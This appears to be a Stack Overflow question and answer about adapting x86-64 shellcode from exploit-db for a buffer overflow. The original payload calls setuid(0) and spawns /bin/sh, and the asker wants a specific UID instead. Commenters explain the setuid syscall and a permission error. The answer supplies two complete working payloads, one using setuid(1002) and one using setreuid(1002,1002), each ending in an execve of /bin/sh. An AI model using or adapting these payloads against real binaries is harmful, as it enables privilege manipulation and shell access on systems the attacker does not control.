# How to set a specific setuid in a shellcode

Tags: assembly, x86-64, buffer-overflow, shellcode, setuid

I'm using the following assembly code found [here](https://www.exploit-db.com/exploits/13320) to setuid(0) and get a shell during a buffer overflow

```
xor    rdi,rdi
mov    al,0x69
syscall
xor    rdx,rdx
movabs rbx,0x68732f6e69622fff
shr    rbx,0x8
push   rbx
mov    rdi,rsp
xor    rax,rax
push   rax
push   rdi
mov    rsi,rsp
mov    al,0x3b
syscall
push   0x1
pop    rdi
push   0x3c
pop    rax
syscall
```

I need to modify it to setuid(1002) instead of setuid(0)

I don't understand where the setuid takes place in this assembly code

Comment: `xor    rdi,rdi
mov    al,0x69
syscall` is the part that sets the UID. [syscall 0x69 (105)](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) takes the UID in RDI. You need to put 1002 into RDI. `xor rdi, rdi` sets rdi to 0.

Comment: Easiest thing to do is after `xor rdi, rdi` which zeroes RDI... place 1002 in the lower 16-bits with `mov di, 1002`

Comment: @MichaelPetch I don't know why the result is `0xffffffffffffffff` in `rax`

Comment: 0xffffffffffffffff is -1 which is EPERM (Operation not permitted). Are you running your code as a regular user or as a root account? If you don't run with root privileges it will fail.

Comment: Thanks! I run in a binary that has the setuid bit. But not as root. I finally found out i had to use setreuid not setuid

Answer (score 1):

this setuid to 1002:

```
xor    rdi,rdi
xor    rax,rax
mov    di, 1002
mov    al,0x69
syscall
xor    rdx,rdx
movabs rbx,0x68732f6e69622fff
shr    rbx,0x8
push   rbx
mov    rdi,rsp
xor    rax,rax
push   rax
push   rdi
mov    rsi,rsp
mov    al,0x3b
syscall
push   0x1
pop    rdi
push   0x3c
pop    rax
syscall
```

and this setreuid to 1002

```
xor    rdi,rdi
xor    rax,rax
xor    rsi, rsi
mov    si, 1002
mov    di, 1002
mov    al,0x71
syscall
xor    rdx,rdx
movabs rbx,0x68732f6e69622fff
shr    rbx,0x8
push   rbx
mov    rdi,rsp
xor    rax,rax
push   rax
push   rdi
mov    rsi,rsp
mov    al,0x3b
syscall
push   0x1
pop    rdi
push   0x3c
pop    rax
syscall
```